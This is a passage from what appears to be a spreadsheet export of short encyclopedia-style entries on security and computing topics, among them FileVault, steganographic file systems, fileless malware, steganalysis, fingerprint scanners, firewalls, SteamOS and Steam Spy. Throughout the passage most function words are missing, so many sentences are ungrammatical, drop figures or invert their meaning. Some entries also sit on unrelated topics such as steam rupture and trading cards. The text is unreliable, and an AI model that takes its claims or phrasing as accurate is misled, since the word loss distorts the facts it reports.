"sleep" state, physical control owner.early versions filevault automatically stored user's passphrase system keychain, requiring user notice manually disable security hole. 2006, following talk 23rd chaos communication congress titled unlocking filevault: analysis apple's encrypted disk storage system, jacob appelbaum ralf-philipp weinmann released vilefault decrypts encrypted disk image files.a free space wipe using disk utility left large portion previously deleted file remnants intact. similarly, filevault compact operations wiped small parts previously deleted data. filevault security filevault uses user's login password encryption pass phrase. uses xts-aes mode blocks encrypt disk, recommended nist. only unlock-enabled users start unlock drive. once unlocked, users also computer shut down. performance performance penalty using filevault found order around using cpus instruction set, intel core 10.10.3. performance deterioration larger cpus without instruction set, older core cpus. master passwords recovery keys when filevault enabled system running, system creates displays recovery computer, optionally offers user store apple. recovery encoded letters numbers read /dev/random, therefore relies security prng used macos. during cryptanalysis 2012, mechanism found safe.changing recovery possible without re-encrypting file vault volume. validation users filevault 10.9 validate correctly works encryption running sudo fdesetup validaterecovery terminal encryption finished. must form xxxx-xxxx-xxxx-xxxx-xxxx-xxxx return true correct. starting filevault without user account volume used startup erased encrypted clean installation 10.7.4 10.8: password volume clean system immediately behave filevault enabled installation recovery key, option store apple (but system behave created) computer started, disk password appear efiloginui used unlock volume start system running system present traditional login window.apple describes type approach disk password—based dek. also apple keychain bitlocker truecrypt veracrypt luks references</t>
  </si>
  <si>
    <t>Steganographic file system</t>
  </si>
  <si>
    <t>steganographic file systems kind file system first proposed ross anderson, roger needham, shamir. their paper proposed main methods hiding data: series fixed size files originally consisting random bits 'vectors' could superimposed allow levels security decrypt lower levels even know existence higher levels, entire partition filled random bits files hidden steganographic file system using second scheme, files merely stored, stored encrypted, entire partition randomized encrypted files strongly resemble randomized sections partition, files stored partition, easy discern meaningless gibberish actual encrypted files. furthermore, locations files derived files, locations hidden available programs passphrase. this leads problem quickly files overwrite (because birthday paradox); compensated writing files multiple places lessen chance data loss. advantage while seem point file system guaranteed either grossly inefficient storage space-wise cause data loss corruption either data collisions loss addition complex system, poor read/write performance), performance goal stegfs. rather, stegfs intended thwart "rubberhose attacks", usually work encrypted files distinguishable regular files, authorities coerce user user gives keys files distinguishable regular files. however, since steganographic file system, number files unknown every byte looks like encrypted byte, authorities cannot know many files (and hence, keys) stored. user plausible deniability innocuous files none all, anybody without keys cannot gainsay user. criticisms poul-henning kamp criticized threat model steganographic file systems paper gbde, observing certain coercive situations, especially searched-for information fact stored steganographic file systems, possible subject "get hook" proving keys surrendered. other methods other methods exist; method laid implemented stegfs, possible steganographically hide data within image (e.g. pngdrive) audio files- scramdisk linux loop device this.generally, steganographic file system implemented steganographic layer, supplies storage mechanism. example, steganographic file system layer existing files, file contains chunk data part file system). final product file system hardly detected (depending steganographic layer) store kind file regular file system hierarchy. truecrypt allows "hidden volumes" passwords open different volumes file, volumes contains secret data. also references external links original paper anderson, needham, -(pdf file) steganographic file system approach magikfs steganographic filesystem stegfs steganographic file system without data losing problems steghide hiding data accesses steganographic file systems xuan zhou's ph.d. thesis steganographic file system</t>
  </si>
  <si>
    <t>Fileless malware</t>
  </si>
  <si>
    <t>fileless malware variant computer related malicious software exists exclusively computer memory-based artifact i.e. ram. write part activity computer's hard drive meaning resistant existing anti-computer forensic strategies incorporate file-based whitelisting, signature detection, hardware verification, pattern-analysis, time-stamping, etc., leaves little evidence could used digital forensic investigators identify illegitimate activity. malware type designed work in-memory, longevity system exists system rebooted. definition fileless malware sometimes considered synonymous in-memory malware perform core functionalities without writing data disk lifetime operation. this commentators claim variant strain nothing simply “redefinition well-known term, memory resident virus”, whose pedigree traced back 1980s birth lehigh virus developed originator term, fred cohen, became influential paper topic.this synonymy however incorrect. although aforementioned behavioral execution environment same, cases i.e. malware variants executed system memory, crucial differentiation method inception prolongation. most malware's infection vector involves writing hard disk, order executed, whose origin could take form infected file attachment, external media device e.g. usb, peripheral, mobile phone etc., browser drive-by, side-channel etc. each aforementioned methods contact host system's hard drive, form another, meaning even employing stealthiest anti-forensic methods, form infected residue left host media. fileless malware hand, point inception process termination (usually system reboot), aims never contents written disk. purpose reside volatile system areas system registry, in-memory processes service areas. history fileless malware evolutionary strain malicious software taken steady model self-improvement/enhancement drive towards clearly defined focused attack scenarios, whose roots traced back terminate-and-stay-resident/memory resident viral programs that, launched, would reside memory awaiting system interrupt gaining access control flow; examples seen viruses frodo, dark avenger, number beast.these techniques evolved temporary memory resident viruses seen famous examples anthrax, monxla took truer "fileless" nature in-memory injected network viruses/worms codered slammer. more modern evolutionary incarnations seen viruses stuxnet, duqu, poweliks, phasebot etc. recent developments february 2017, kaspersky lab's global research analysis team published report titled: "fileless attacks enterprise networks" implicates variants type malware, latest incarnations, affecting enterprise networks across globe banks, telecommunication companies government organisations targets. report details variant fileless malware using powershell scripts (located within microsoft windows registry system) launch attack target's machine leveraging common attack framework called metasploit supporting attack tools mimikatz, leveraging standard windows utilities ‘sc’ ‘netsh’ assist lateral movement. malware detected bank identified metasploit meterpreter code running physical memory central domain controller (dc).kaspersky labs company identified emerging trends, principal security anti-malware companies coming forward similar findings: symantec, trend micro, mcafee labs, cybereason, etc. digital forensics emergence malware operate fileless presents major problem digital forensic investigators, whose reliance able obtain digital artifacts crime scene critical ensuring chain custody producing evidence admissible court law. many well-known digital forensic process models casey 2004, dfrws 2001, 2004, cohen 2009, embed either examination and/or analysis phase respective models, implying evidence obtained/collected/preserved mechanism. difficulty becomes apparent considering standard operating procedures digital investigators deal computer crime scene. traditional methods direct investigator not, circumstances, switch computer make sure computer switched screen savers give appearance computer switched off, hard drive monitor activity lights indicate machine switched remove main power source battery laptop computers. unplug power devices sockets computer itselffileless malware subverts forensics models, evidence acquisition take place memory image obtained live running system investigated. this method, however, compromise acquired host's memory image render legal admissibility questionable, least, instill enough reasonable doubt weight evidence presented drastically reduced, increasing chances trojan horse "some dude done defences used effectively. this renders type malware extremely attractive adversaries wishing secure foothold network, perform difficult trace lateral movement quick silent manner, standard forensic investigatory practices ill-prepared threat. references external links fileless malware: evolving threat horizon hello super-stealthy malware that’s going mainstream fileless malware takes 2016 storm fileless attack using queries carry powershell commands kovter becomes almost file-less, creates file type, gets certificates</t>
  </si>
  <si>
    <t>Filesystem-level encryption</t>
  </si>
  <si>
    <t>filesystem-level encryption, often called file-based encryption, fbe, file/folder encryption, form disk encryption individual files directories encrypted file system itself. this contrast full disk encryption entire partition disk, file system resides, encrypted. types filesystem-level encryption include: 'stackable' cryptographic filesystem layered main file system single general-purpose file system encryptionthe advantages filesystem-level encryption include: flexible file-based management, file usually encrypted separate encryption individual management encrypted files e.g. incremental backups individual changed files even encrypted form, rather backup entire encrypted volume access control enforced public-key cryptography, fact cryptographic keys held memory file decrypted held open. general-purpose file systems encryption unlike cryptographic file systems full disk encryption, general-purpose file systems include filesystem-level encryption typically encrypt file system metadata, directory structure, file names, sizes modification timestamps. this problematic metadata needs kept confidential. words, files stored identifying file names, anyone access physical disk know documents stored disk, although contents documents. exception encryption support added filesystem. filesystem metadata filenames, ownership, acls, extended attributes stored encrypted disk. metadata relating storage pool stored plaintext, possible determine many filesystems (datasets) available pool, including ones encrypted. content stored files directories remain encrypted. another exception cryfs replacement encfs. cryptographic file systems cryptographic file systems specialized (not general-purpose) file systems specifically designed encryption security mind. they usually encrypt data contain including metadata. instead implementing on-disk format block allocation, file systems often layered existing file systems e.g. residing directory host file system. many file systems also offer advanced features, deniable encryption, cryptographically secure read-only file system permissions different views directory structure depending user cryptographic file system part existing file system synchronized 'cloud storage'. cases cryptographic file system could 'stacked' top, help protect data confidentiality. also steganographic file system list cryptographic file systems disk encryption</t>
  </si>
  <si>
    <t>Fill device</t>
  </si>
  <si>
    <t>fill device loader module used load cryptographic keys electronic encryption machines. fill devices usually hand held electronic ones battery operated. older mechanical encryption systems, rotor machines, keyed setting positions wheels plugs printed keying list. electronic systems required load necessary cryptovariable data. 1950s 1960s, systems u.s. national security agency kw-26 soviet union's fialka used punched cards purpose. later encryption systems incorporated serial port fill connector developed several common fill devices (cfds) could used multiple systems. plugged keys loaded. newer systems allow "over rekeying" (otar), master often must still loaded using fill device. uses serial protocols fill, ds-101 ds-102. both employ u-229 6-pin connector type used u.s. military audio handsets, ds-101 newer serial fill protocols. ds-101 protocol also used load cryptographic algorithms software updates crypto modules. besides encryption devices, systems require fill include iff, frequency hopping radios have quick sincgars. common fill devices employed include: kyk-28 used nestor (encryption) system kyk-13 electronic transfer device kyx-15 control device mx-10579 eccm fill device (sincgars) koi-18 paper tape reader. operator pulls 8-level tape unit hand. an/cyz-10 data transfer device small pda-like unit store 1000 keys. secure dtd2000 system (sds) named kik-20, next generation common fill device replacement started production 2006. employs windows operating system. an/pyq-10 simple loader (skl) simpler replacement dtd. ksd-64 crypto ignition (cik) kik-30, recent fill device, trademarked "really simple loader" (raskl) "single button key-squirt." supports wide variety devices keys.the older kyk-13, kyx-15 mx-10579 limited certain types. also list cryptographic types references external links fill devices kyx-15 pictures</t>
  </si>
  <si>
    <t>Steganalysis</t>
  </si>
  <si>
    <t>steganalysis study detecting messages hidden using steganography; analogous cryptanalysis applied cryptography. overview goal steganalysis identify suspected packages, determine whether payload encoded them, and, possible, recover payload. unlike cryptanalysis, intercepted data contains message (though message encrypted), steganalysis generally starts pile suspect data files, little information files, any, contain payload. steganalyst usually something forensic statistician, must start reducing data files (which often quite large; many cases, entire files computer) subset likely altered. basic techniques problem generally handled statistical analysis. unmodified files type, ideally source (for example, model digital camera, possible, digital camera; digital audio files "ripped" from; etc.) inspected, analyzed various statistics. some simple spectrum analysis, since image audio files days compressed lossy compression algorithms, jpeg mp3, also attempt look inconsistencies data compressed. example, common artifact jpeg compression "edge ringing", high-frequency components (such high-contrast edges black text white background) distort neighboring pixels. this distortion predictable, simple steganographic encoding algorithms produce artifacts detectably unlikely. case detection suspect files straightforward original, unmodified carrier available comparison. comparing package original file yield differences caused encoding payload—and, thus, payload extracted. advanced techniques noise floor consistency analysis cases, single image available, complicated analysis techniques required. general, steganography attempts make distortion carrier indistinguishable carrier's noise floor. practice, however, often improperly simplified deciding make modifications carrier resemble white noise closely possible, rather analyzing, modeling, consistently emulating actual noise characteristics carrier. particular, many simple steganographic systems simply modify least-significant (lsb) sample; causes modified samples different noise profiles unmodified samples, also lsbs different noise profiles could expected analysis higher-order bits, still show amount noise. such lsb-only modification detected appropriate algorithms, cases detecting encoding densities reasonable reliability. further complications encrypted payloads detecting probable steganographic payload often part problem, payload encrypted first. encrypting payload always done solely make recovery payload difficult. most strong ciphers desirable property making payload appear indistinguishable uniformly-distributed noise, make detection efforts difficult, save steganographic encoding technique trouble distribute signal energy evenly (but concerning errors emulating native noise carrier). barrage noise inspection storage device considered likely, steganographer attempt barrage potential analyst with, effectively, misinformation. this large files encoded anything random data, white noise, meaningless drivel, deliberately misleading information. encoding density files slightly higher "real" ones; likewise, possible multiple algorithms varying detectability considered. steganalyst forced checking decoys first, potentially wasting significant time computing resources. downside technique makes much obvious steganographic software available, used. conclusions action obtaining warrant taking action based solely steganalytic evidence dicey proposition unless payload completely recovered decrypted, otherwise analyst statistic indicating file modified, modification result steganographic encoding. because likely frequently case, steganalytic suspicions often backed investigative techniques. also references bibliography geetha, siva s.sivatha sindhu (october 2009). "blind image steganalysis based content independent statistical measures maximizing specificity sensitivity system". computers security. elsevier, science direct. (7): 683–697. doi:10.1016/j.cose.2009.03.006. geetha, kamaraj (july 2010). "evolving decision tree rule based system audio stego anomalies detection based hausdorff distance statistics". information sciences. elsevier, science direct. (13): 2540–2559. doi:10.1016/j.ins.2010.02.024. external links steganalysis research papers neil johnson addressing attacks steganography watermarking, countermeasures attacks. research group. ongoing research steganalysis. steganography implementation detection short introduction steganography, discussing several information sources information stored</t>
  </si>
  <si>
    <t>StegFS</t>
  </si>
  <si>
    <t>stegfs free steganographic file system linux based ext2 filesystem. licensed gpl. principally developed andrew mcdonald markus kuhn. last version stegfs 1.1.4, released february 2001. this development release, known bugs, file corruption bug. there stable release. last website activity 2004. 2003, andreas petter sebastian urbach intended continue development stegfs, created site sourceforge.net. development moved using fuse library, working releases available development homepage. also filesystem-level encryption list cryptographic file systems further reading anderson, ross; needham, roger; shamir, (1998). steganographic file system (pdf). lecture notes computer science. vol. 1525. 73–82. citeseerx 10.1.1.42.1676. doi:10.1007/3-540-49380-8_6. isbn 978-3-540-65386-8. mcdonald, andrew kuhn, markus (2000). stegfs: steganographic file system linux (pdf). lecture notes computer science. vol. 1768. 463–477. citeseerx 10.1.1.42.8054. doi:10.1007/10719724_32. isbn 978-3-540-67182-4. external links stegfs original home page stegfs development home page stegfs research paper -(pdf file) stegfs sourceforge project page</t>
  </si>
  <si>
    <t>Steering-wheel lock</t>
  </si>
  <si>
    <t>steering-wheel lock visible anti-theft device immobilizes steering wheel car. such devices lower chance stolen.also known crook lock, club lock, first generation steering-wheel locks, known canes, consisted lockable connected steering wheel brake pedal clutch pedal. later models include devices lock across steering wheel extend dashboard preventing steering wheel turned.wheel-locks used since least early 1920s, many cars open touring cars roadsters (later known convertibles). official gazette united states patent office published details patents filed 1916. also club (automotive) references</t>
  </si>
  <si>
    <t>Fingerprint scanner</t>
  </si>
  <si>
    <t>fingerprint scanners security systems biometrics. they used police stations, security industries, smartphones, mobile devices. function everyone patterns friction ridges fingers, pattern called fingerprint. fingerprints uniquely detailed, durable individual's lifetime, difficult alter. because countless combinations, fingerprints become ideal means identification. types fingerprint scanners there four types fingerprint scanners: optical scanners, capacitance scanners, ultrasonic scanners, thermal scanners. basic function every type scanner obtain image person's fingerprint find match database. measure fingerprint image quality dots inch (dpi). optical scanners take visual image fingerprint using digital camera. capacitive cmos scanners capacitors thus electrical current form image fingerprint. this type scanner tends excel terms precision. ultrasonic fingerprint scanners high frequency sound waves penetrate epidermal (outer) layer skin. thermal scanners sense temperature differences contact surface, fingerprint ridges valleys.all fingerprint scanners susceptible fooled technique involves photographing fingerprints, processing photographs using special software, printing fingerprint replicas using printer. construction forms there construction forms: stagnant moving fingerprint scanner. stagnant: finger must dragged small scanning area. this cheaper less reliable moving form. imaging less ideal finger dragged scanning area constant speed. moving: finger lies scanning area scanner runs underneath. because scanner moves constant speed fingerprint, imaging superior. usage form stand-alone readers microsoft released fingerprint reader 2005. integrated readers from early 2000, laptops card support equipped readers; example, compaq armada e500 optionally equipped external fingerprint reader since 2000 reader module released toshiba. produced laptops integrated readers since 2004. apple's marketing name electronic fingerprint recognition, known touch introduced 2013 smartphones, laptop option released 2016. implementation delayed 2013 integrated optical trackpad scanner patented (blackberry) 2004. blackberry produced smartphones readers since 2010 first model feature budget blackberry curve. also fingerprint#capture detection references</t>
  </si>
  <si>
    <t>Fire-Lite Alarms</t>
  </si>
  <si>
    <t>fire-lite alarms american company owned honeywell based northford, connecticut. fire-lite manufactures fire alarm control panels (facps), evac (emergency voice alarm communicator) panels, manual pull stations, digital alarm communicators, annunciators. fire-lite founded 1952 edward levy, along son, herbert. time, company installed serviced fire alarm systems. however, levy began focus designing components, 1962, company stopped installing servicing systems. 1973, company grown substantially, moved 50,000-square-foot (4,600 building. fire-lite first company introduce compact, inexpensive addressable fire alarm control panel. some recognizable products include fire-lite bg-10 pull station, introduced 1983, newer bg-12 pull station, introduced 1999. fire-lite part honeywell life safety group, along notifier. also notifier system sensor fire alarm system references external links fire-lite alarms honeywell</t>
  </si>
  <si>
    <t>FireHOL</t>
  </si>
  <si>
    <t>firehol shell script designed wrapper iptables written ease customization linux kernel's firewall netfilter. firehol free software open-source, distributed terms general public license. firehol graphical user interface, configured easy understand plain text configuration file. firehol first parses configuration file sets appropriate iptables rules achieve expected firewall behavior. large, complex bash script file, depending iptables console tools rather communicating kernel directly. linux system iptables, bash, appropriate tools main drawback slower starting times, particularly older systems. firehol's configuration files fully functional bash scripts themselves. external links official website firehol github</t>
  </si>
  <si>
    <t>SteamOS</t>
  </si>
  <si>
    <t>steamos linux distribution developed valve. open source closed source components primary operating system steam machines steam deck. initial versions steamos, versions 2.0, based debian distribution linux. steamos built support streaming video games personal computer running steamos within network, though operating system support standalone systems intended used part valve's steam machine platform. with steamos, valve encouraged developers incorporate linux compatibility releases better support linux gaming options. july 2021, valve announced steam deck, handheld gaming computer. runs steamos 3.0, based arch linux distribution plasma desktop, rather debian base gnome desktop used earlier versions steamos. features steamos designed primarily playing video games away (such couch one's living room) providing console-like experience using generic hardware connect directly television. games natively developed linux purchased steam store. users also able stream games windows, linux computers running steamos, incorporates family sharing restrictions steam desktop. valve claims "achieved significant performance increases graphics processing" steamos. operating system open source, allowing users build adapt source code, though actual steam client closed.since steamos solely playing games without mouse keyboard, many built-in functions beyond browsing playing games; example, file manager image viewer installed default. users can, however, access plasma desktop environment perform tasks installing software. though currently support streaming services, valve historically considered integration spotify netflix. however, steam full-length films indie movie makers available store. natively supports nvidia, intel, graphics processors.valve stated added support movies, television, music steamos. however, video content available steam's store, small number films. music playback supports local music collections. october 2015, update allowed netflix protected content function native built-in browser.the current system hardware requirements default steamos installations include: intel 64-bit capable processor least least one’s hard disk nvidia (fermi graphics cards newer), intel, graphics card (radeon 8500 newer) port installation uefi boot supporta custom installer method also available, require additional configuration steps. this method allows smaller hard-disk sizes. there also image installer supports legacy bios motherboard. installers sourced valve's repository. development during panel linuxcon september 2013, valve co-founder executive director gabe newell stated believed "linux open source future gaming", going company aiding game developers want make games compatible linux, would making announcement following week related introducing linux living room. september 2013, valve posted statement website titled steam universe expanding 2014 teased three announcements related "even ways connect dots customers want steam living-room". first announcement made september steamos, valve saying "come conclusion environment best suited delivering value customers operating system built around steam itself". large focus reveal openness operating system, announced users would able alter replace part software, would free.in october 2013, valve announced steam days; two-day developer conference video game developers could test provide feedback steamos steam machines. october 2013, nvidia also announced collaboration valve support steamos help development suite called nvidia gameworks incorporates physx, optix, visualfx nvidia-proprietary apis implementations thereof.in november 2013, valve confirmed would making exclusive games steamos, discouraged developers goes philosophy selling games wherever customers are. december, valve announced beta version steamos would released december 2013. when beta version released, valve encouraged customers unfamiliar linux wait 2014.in mid-october 2015, preorders steam controller, steam link, alienware branded steam machines became available. official release date steam machines november 2015.on july 2021, valve announced steam deck, brand handheld gaming device. steam deck runs customized version steam based upon arch linux, desktop mode powered plasma decision move debian arch linux based different update schedule distributions. debian, geared server configurations, core software update large package intermediate patches known security fixes, arch uses rolling update approach parts. valve found rolling update approach would better suited steam deck, allowing address issues fixes much faster debian would allow. valve affirmed steamos continue freely available, intention allowing hardware developers take advantage build similar handheld computing devices like deck. releases performance december 2013, phoronix compared three nvidia graphics cards steamos windows 8.1. overall, nvidia's proprietary linux graphics driver delivered performance comparable windows drivers platforms’ largely shared codebase. january 2014, gamespot compared performance three games (dota left dead metro: last light) running windows steamos. with graphics card, found considerably fewer frames second steamos, left dead stuttered, attributed device driver problem. with nvidia graphics card, found metro: last light slightly higher frame rate dota broke even. with video card brands, left dead dota longer load times steamos.when steam machines officially released november 2015, technica compared rendering performance cross-platform games steamos windows running machine, using average frame-per-second measurements, found games rendered slower steamos. technica suggested might inexperience developers optimizing opengl contrast directx, believed performance might improve future titles. they noted benchmark test, using games single computer, comprehensive. march 2022, linus tech tips compared steamos performance windows steam deck using three gaming benchmarks (including hitman doom eternal, elden ring) showed three titles average higher frames second steamos. hitman delivered average windows average steamos. doom eternal, steamos average windows average. elden ring steamos topping average running windows average. reception following steamos’ initial announcement, many video game developers expressed enthusiasm. minecraft creator markus persson described "amazing news," thomas alone developer mike bithell called "encouraging" indie games. other developers dice, creators battlefield series, creative assembly, developers total series, stated linux support games following steamos’ release.on operating system front, gearbox software head randy pitchford expressed belief operating system needed unique application attract developers, saying "without must-buy product driving towards stuff, expect industry large watch curiously, remain largely unaffected." richard stallman, former president free software foundation, expressed cautious support, condone non-free games drm.the steamos beta release received mixed reviews. techradar's review henry winchester praised easy navigate interface future potential criticized hard installation lack extra features compared steam software. eurogamer's thomas morgan experience installation problems, commented negatively lack options available detecting monitor resolutions audio output, addition lack games available natively operating system. however, responded well user interface, calling positive start".since then, outlets technica revisited steamos since initial debut, offering observations platform's growth, pros, cons. both falcon northwest origin computer manufacturers planning offering steam machine hardware, opted ship steamos-enabled machine 2015 limitations steamos windows; falcon northwest said would still consider shipping machines steamos future performance improves. also linux gaming references external links official website</t>
  </si>
  <si>
    <t>Firefly (key exchange protocol)</t>
  </si>
  <si>
    <t>firefly u.s. national security agency public-key exchange protocol, used ekms, stu-iii secure telephone, several u.s. cryptographic systems. references 2522 communications security custodian guide, usareur pamphlet 380-40 taclane-micro inline network encryptor interface operator’s guide</t>
  </si>
  <si>
    <t>Steam rupture</t>
  </si>
  <si>
    <t>steam rupture occurs within pressurized system super critical water pressure exceeds design plus safety margin specification. steam rupture occur high temperature pressurized system, including, limited automobile cooling systems, stationary power plants, mobile power plants, steam driven tools (such trip hammers), even delivery systems application processes cleaning fabric fullering. references</t>
  </si>
  <si>
    <t>Steam Trading Cards</t>
  </si>
  <si>
    <t>steam trading cards digital commodity issued valve digital distribution service, steam. steam trading cards non-physical analogue conventional trading cards, periodically granted steam users playing games, fulfilling tasks, random chance. cards "crafted" acquire steam-centric awards emoticons profile backgrounds, traded steam users, sold steam community market store credit. since introduction 2013, steam trading card sets integrated 11,000 games 2022. developer revenue gained trading card sales attracted undesirable attention "asset flippers"; developers release low-quality games onto steam solely profit trading cards. series blog posts, valve condemned behavior, calling games "fake", claimed trading card farming responsible damaging steam storefront. history years prior introduction steam trading cards, valve implemented multiple features steam facilitate trading, buying, selling virtual goods. steam trading introduced 2011, allows users trade virtual game items other. during 2011 steam winter sale, users could complete objectives select games receive virtual "coal" could redeemed prizes, progenitor system would later utilized steam trading cards. steam community market introduced late 2012, enables steam users sell virtual goods store credit.steam trading cards entered open beta 2013, games initially participating system. description like physical counterparts, steam trading cards collectible commodity routinely traded, bought, sold. supported games trading cards, typically incorporate game designs. after collecting full trading cards, user option "craft" cards, permanently removing steam inventory exchange game-themed emoticon, profile background, profile badge, amount steam "xp". used increase profile's level, unlocks profile customization options, increases friend limit cap, raises probability "booster pack" trading card drops. standard game badges award every level. these badges upgraded times, level badge displaying image. distribution steam trading cards distributed several methods; game trading card set, playing game periodically grant player trading cards threshold met. games, threshold reached user received half number cards required full set. free play games, cards drop player makes purchase associated game. "booster packs", contain random assortment three cards game, periodically drop users drop threshold.during seasonal sales, valve releases unique trading card sets coincide event. these sets available limited time, obtained making steam purchases, crafting sets trading cards, completing event-specific goals, browsing queue games. impact steam trading cards afforded developers means generate revenue beyond game sales, trading cards soon became driving forces behind "asset flipping", process steam games cheaply quickly made, often store-bought assets minimal differences other, hopes netting profit trading card sales. april 2017 joint conference game commentators sterling john "totalbiscuit" bain, valve agreed large portion games steam existed "mill" cards profit, valve labeling asset flips "fake games". 2017, valve claimed "fake games" harmed steam feeding "faux data" storefront's algorithm, resulted asset flips granted disproportionate amount storefront exposure relative number people actually playing them. counter this, valve implemented "confidence metric" system, wherein trading cards drop games pass sales threshold.in september 2017, valve ended business relationships silicon echo studios, implicated asset flipping scheme involving numerous developer accounts managed person. under multiple aliases, studio released games onto steam months prior, accounting percent games released months. references external links official website</t>
  </si>
  <si>
    <t>Steam Spy</t>
  </si>
  <si>
    <t>steam website created sergey galyonkin launched april 2015. site uses application programming interface (api) steam software distribution service owned valve estimate number sales software titles offered service. estimates made based polling user profiles steam determine software titles (primarily video games) using statistics estimate overall sales. software developers reported galyonkin's algorithms provide sales numbers accurate within 10%, though galyonkin cautions using estimates financial projections business-critical decisions. changes steam's privacy features april 2018, galyonkin anticipated would need shut service inability estimate accurate numbers sources, later month revealed algorithm using publicly available data, which, larger number outliers, still believes reasonable accuracy use. concept history tracking video game sales strong interest video game industry, robustness industries, television nielsen ratings system music billboard charts. though group track retail digital sales video games, access data requires payment typically break distribution sales various platforms. sites like vgchartz attempted collect detailed sales figures based external data, reported problems data aggregated. valve's steam client largest outlet digital sales games microsoft windows, linux platforms. normally, sales video games software offered steam kept confidential valve publishers developers titles; developers publishers free offer numbers public desired. valve offer statistics bought played games, otherwise provide sales figures publicly. galyonkin noted whereas film industry receives funding financing companies open sharing financial results, funding within video game comes variety non-traditional sources, leading market report sales game.the idea steam originally came similar approach used kyle orland website technica "steam gauge" feature starting april 2014. steam gauge uses steam access publicly available user profiles obtain list games user owns. time creation million steam accounts, making task polling entire list games impractical. instead, opted poll 80,000 90,000 collect game lists, used sampling statistics estimate total ownership game. technica estimated onset margin error within 0.33%. galyonkin inspired steam gauge create steam spy. time, galyonkin senior analyst wargaming. steam uses approach sampling small percentage steam accounts, approximately 100,000 150,000 rolling sampling approach. collected data processed nightly create visualizations used site, thus offers historical trends games well. steam gauge, galyonkin notes steam subject similar sampling errors, data newly released games games sales likely accurate estimates numbers. polling approach also prone promotions valve runs, game offered free weekend; time, game appear owned every steam profile, artificially bump sales numbers. galyonkin's method also polls amount time profile played particular game, allowing collect estimated playtime statistics per-game basis.as september 2016, galyonkin continues operate site plans several major features, alongside current position head publishing eastern europe epic games.however, april 2018, valve announced change steam's privacy policies, giving users ability hide games, friend lists, elements provide means user privacy. galyonkin announced change, specifically default settings users would hide profile elements, would unable collect necessary data needed steam spy, plans shut service. galyonkin available data sources pull estimates from, feel provide type accuracy felt approach steam could meet; sources personal research well role epic games, plan publish results depth. galyonkin plans maintain archives steam indefinitely. change steam's privacy settings came around time heightened awareness personal data security, including facebook–cambridge analytica data scandal pending enforcement european union's general data protection regulation, brought steam's privacy settings inline offered game console services. while journalists game developers believed changes steam best, feared closure steam would significant impact independent game developers, used service gauge potential market sales projections.later april 2018, galyonkin reported returned earlier algorithms developed used publicly available data serve possible replacement. tested algorithm games estimates calculated coming within known sales figures, also observed outliers, making algorithm less accurate previous one, still sufficient market research purposes. golyonkin plans refine algorithm continue operating steam spy.in december 2018, epic games announced plans start similar storefront steam, epic games store. galyonkin stated shortly announcement working epic years help develop store, using information analysis gained running steam help establish features policies epic games store use, providing developers much sales data reasonably can. galyonkin still continue operate steam spy. impact galyonkin says estimates sales confirmed close several developers. gamasutra says developers spoken also agree numbers steam right ballpark". several developers speaking pcgamesn stated steam accurate within actual sales figures games thousand sales, accuracy drops low-selling titles; galyonkin says data games 30,000 sales considered suspect. dave gilbert wadjet games noted developers take caution towards using steam spy's data financial projections analysis factor cost game purchased obtained, fluctuate sales, gifts, developer promotions, situations. undisclosed video game publisher, speaking gamasutra, praised steam go-to tool used frequently industry track trends, stating "each game tracks, broadly speaking, within stated margin error". galyonkin warn accuracy steam data, equating accuracy political surveys believes sufficiently accurate general analysis trends broad distributions. forementioned undisclosed publisher noted steam data never used isolation make critical development publishing decisions.prior august 2016, galyonkin honored requests developers publishers remove games tracking system; examples include kerbal space program games published paradox interactive. when paradox requested removal june 2016, paradox's shams jorjani noted seen "flawed" business plans developers seeking publisher support based solely ownership data published steam spy, prompting request. however, august 2016, galyonkin reversed choice, retroactively reincluding stats games previously removed. galyonkin opted techland requested remove games site, prompting reassert site meant polling tool game developers capture accurate sales data, "removing several important independent games service hurt everyone else necessarily benefitting publishers removed games". galyonkin noted legal requirement hide otherwise-public non-confidential data, felt developer harmed revealing information. developer latin american company tell gamasutra concerned steam spy's reporting high sales game, would potentially lead offices become target theft region.steam used help quantify certain trends video game buying behaviors galyonkin sources. example, valve introduced ability allow buyers request refund game within certain time constraints mid-2015, galyonkin observed games received small increase sales, proposing refund policy enabled users open games. galyonkin also observed games using steam early access program typically largest sales point release early access opposed completed release. galyonkin's data also shows that, based two-week period august 2015, steam users spend time playing games published valve, specifically dota counter-strike: global offensive, team fortress galyonkin able track number concurrent players game time, allowing determine "hype factor" "surprise factor" games based much player base shrunk grew, respectively, release, correlate sales estimates.in june 2018, valve said also looking provide tools similar steam provided directly apis others accurate reporting make better steam spy. references external links official website</t>
  </si>
  <si>
    <t>Firestarter (firewall)</t>
  </si>
  <si>
    <t>firestarter personal firewall tool uses netfilter (iptables/ipchains) system built linux kernel. ability control inbound outbound connections. firestarter provides graphical interface configuring firewall rules settings. provides real-time monitoring network traffic system. firestarter also provides facilities port forwarding, internet connection sharing dhcp service. firestarter free open-source software uses widgets gtk+. note uses gtk2 upgraded gtk3 last linux distributions ubuntu debian etc. also uncomplicated firewall iptables netfilter references external links firestarter (firewall) sourceforge firestarter manual sourceforge https://www.maketecheasier.com/configure-a-firewall-in-linux-using-firestarter/</t>
  </si>
  <si>
    <t>Firewall (computing)</t>
  </si>
  <si>
    <t>computing, firewall network security system monitors controls incoming outgoing network traffic based predetermined security rules. firewall typically establishes barrier trusted network untrusted network, internet. history term firewall originally referred wall intended confine fire within line adjacent buildings. later uses refer similar structures, metal sheet separating engine compartment vehicle aircraft passenger compartment. term applied late 1980s network technology emerged internet fairly terms global connectivity. predecessors firewalls network security routers used late 1980s. because already segregated networks, routers could apply filtering packets crossing them.before used real-life computing, term appeared 1983 computer-hacking movie wargames, possibly inspired later use. types firewalls categorized network-based host-based system. network-based firewalls positioned anywhere within wan. they either software appliance running general-purpose hardware, hardware appliance running special-purpose hardware, virtual appliance running virtual host controlled hypervisor. firewall appliances also offer firewall functionality, dhcp services. host-based firewalls deployed directly host control network traffic computing resources. this daemon service part operating system agent application protection. packet filter first reported type network firewall called packet filter, inspect packets transferred computers. firewall maintains access control list dictates packets looked action applied, any, default action silent discard. three basic actions regarding packet consist silent discard, discard internet control message protocol reset response sender, forward next hop. packets filtered source destination addresses, protocol, source destination ports. bulk internet communication 20th early 21st century used either transmission control protocol (tcp) user datagram protocol (udp) conjunction well-known ports, enabling firewalls distinguish specific types traffic browsing, remote printing, email transmission, file transfers.the first paper published firewall technology 1987 engineers digital equipment corporation (dec) developed filter systems known packet filter firewalls. at&amp;t bell labs, bill cheswick steve bellovin continued research packet filtering developed working model company based original first-generation architecture. 1992, steven mccanne jacobson released paper packet filter (bpf) lawrence berkeley laboratory. connection tracking from 1989–1990, three colleagues 